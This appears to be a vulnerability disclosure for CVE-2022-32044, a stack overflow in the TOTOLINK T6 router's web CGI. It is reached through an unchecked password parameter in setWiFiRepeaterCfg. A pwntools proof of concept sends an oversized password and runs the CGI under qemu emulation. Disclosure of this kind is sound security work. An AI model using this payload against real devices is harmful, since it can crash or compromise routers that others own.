Headline
CVE-2022-32044: IoT-vuln/Totolink/T6-v2/5.setWiFiRepeaterCfg at main · d1tto/IoT-vuln
TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the password parameter in the function FUN_00413f80.
The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413f80 (at address 0x413f80) gets the JSON parameter password, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:
The program gets the JSON parameter encrypt, password, opmode. When encrypt is equal to WEP and opmode is equal to rpt, the program will enter the branch at line 268.
from pwn import * import json
data = { "topicurl": "setting/setWiFiRepeaterCfg", "opmode": "rpt", "encrypt": "WEP", "password": "A"*0x400, }
data = json.dumps(data) print(data)
argv = [ "qemu-mipsel-static", "-g", "1234", "-L", "./root/", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]
a = process(argv=argv) a.sendline(data.encode())
a.interactive()